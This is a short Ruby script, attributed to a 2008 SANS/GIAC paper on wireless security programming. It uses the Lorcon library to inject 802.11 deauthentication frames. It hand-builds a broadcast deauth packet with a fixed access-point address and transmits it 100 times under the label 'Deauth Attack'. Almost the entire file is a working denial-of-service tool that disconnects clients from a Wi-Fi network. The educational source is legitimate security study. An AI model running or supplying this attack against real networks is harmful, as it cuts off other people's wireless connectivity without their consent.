#!/usr/bin/ruby

########################################
#
# This code is part of the SANS/GIAC Gold Paper titled
#
# Programming Wireless Security
#
# by Robin Wood (dninja@gmail.com), accepted May 2008
#
# For more information you can find the paper in the "Wireless Access" section of the
# SANS Reading Room at http://www.sans.org/reading_room/ or at www.digininja.org
#
########################################

$datastore = Hash.new("Unknown")
$datastore["INTERFACE"] = "ath0"
$datastore["CHANNEL"] = 11
$datastore["DRIVER"] = "madwifing"

begin
	require "Lorcon"
	@lorcon_loaded = true
rescue ::Exception => e
	@lorcon_loaded = false
	@lorcon_error  = e
end

if (not @lorcon_loaded)
	puts ("The Lorcon module is not available: #{@lorcon_error.to_s}")
	raise RuntimeError, "Lorcon not available"
end

# XXX: Force the interface to be up
system("ifconfig", $datastore["INTERFACE"], "up")

wifi = ::Lorcon::Device.new($datastore["INTERFACE"], $datastore["DRIVER"])
wifi.fmode      = "INJECT"
wifi.channel    = 11
wifi.txrate     = 2
wifi.modulation = "DSSS"

if (not wifi)
	raise RuntimeError, "Could not open the wireless device interface"
end

destination_addr = "\xff\xff\xff\xff\xff\xff";
source_addr = "\x00\x0e\xa6\xce\xe2\x28";
bss_id_addr = "\x00\x0e\xa6\xce\xe2\x28";

# Type/Subtype 0/c0 Management/Deauthentication
packet = '\xc0\x00'
# flags and duration
packet = packet + '\x00\x00'
packet = packet + destination_addr
packet = packet + source_addr
packet = packet + bss_id_addr
# fragment number and sequence number
packet = packet + '\x00\x00'
# Reason code
packet = packet + '\x01\x00'

puts "Deauth Attack\n"

100.times do
	wifi.write(packet)
end

puts "Done"